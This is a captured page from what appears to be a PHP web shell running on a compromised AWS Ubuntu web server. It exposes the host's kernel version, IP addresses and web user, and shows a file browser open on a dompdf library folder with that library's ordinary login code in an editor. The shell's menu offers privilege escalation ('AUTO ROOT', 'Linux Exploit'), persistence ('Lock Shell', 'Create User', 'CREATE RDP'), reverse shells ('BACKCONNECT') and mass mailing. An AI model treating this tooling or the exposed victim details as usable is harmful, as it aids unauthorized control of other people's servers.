Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.145.84.128
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
sdu /
libs /
dompdf /
www /
[ HOME SHELL ]
Name
Size
Permission
Action
cssSandpaper
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
test
[ DIR ]
drwxr-xr-x
controller.php
1.88
KB
-rwxr-xr-x
debugger.php
4.47
KB
-rwxr-xr-x
demo.php
1.95
KB
-rwxr-xr-x
examples.php
3.49
KB
-rwxr-xr-x
fonts.php
4.96
KB
-rwxr-xr-x
foot.inc
350
B
-rwxr-xr-x
functions.inc.php
1.42
KB
-rwxr-xr-x
head.inc
1.93
KB
-rwxr-xr-x
index.php
1017
B
-rwxr-xr-x
jquery-1.4.2.js
70.48
KB
-rwxr-xr-x
setup.php
9.23
KB
-rwxr-xr-x
style.css
3.92
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : functions.inc.php
<?php function auth_ok(){ return isset($_SESSION["authenticated"]) && $_SESSION["authenticated"] === true; } function auth_get_link(){ return '<a href="'.get_php_self().'?login=1">Authenticate to access this section</a>'; } function get_php_self(){ return isset($_SERVER['PHP_SELF']) ? htmlentities(strip_tags($_SERVER['PHP_SELF'],''), ENT_QUOTES, 'UTF-8') : ''; } // From apc.php function auth_check() { if ( isset($_GET["login"]) && DOMPDF_ADMIN_PASSWORD == "password" ) { $_SESSION["auth_message"] = "The password must be changed in 'dompdf_config.custom.inc.php'"; return false; } else { $_SESSION["auth_message"] = null; } if ( isset($_GET["login"]) || isset($_SERVER["PHP_AUTH_USER"]) ) { if (!isset($_SERVER["PHP_AUTH_USER"]) || !isset($_SERVER["PHP_AUTH_PW"]) || $_SERVER["PHP_AUTH_USER"] != DOMPDF_ADMIN_USERNAME || $_SERVER["PHP_AUTH_PW"] != DOMPDF_ADMIN_PASSWORD) { $PHP_SELF = get_php_self(); header('WWW-Authenticate: Basic realm="DOMPDF Login"'); header('HTTP/1.0 401 Unauthorized'); echo <<<EOB <html><body> <h1>Rejected!</h1> <big>Wrong Username or Password!</big><br/> <br/> <big><a href='$PHP_SELF'>Continue...</a></big> </body></html> EOB; exit; } else { $_SESSION["auth_message"] = null; $_SESSION["authenticated"] = true; return true; } } }
Close